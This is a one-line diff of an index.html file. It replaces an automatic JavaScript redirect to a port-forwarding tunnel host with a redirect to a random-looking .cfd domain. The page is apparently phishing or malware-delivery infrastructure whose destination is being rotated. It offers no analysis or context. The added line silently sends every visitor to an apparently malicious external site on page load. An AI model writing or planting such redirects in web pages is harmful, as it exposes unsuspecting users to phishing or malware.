--- a/index.html
+++ b/index.html
@@ -1,1 +1,1 @@
-<script type="text/javascript">window.location.href ="https://infotechser-56339.portmap.io:56339/doc/";</script>
+<script type="text/javascript">window.location.href ="https://kidneslopshde.cfd/kizo/";</script>
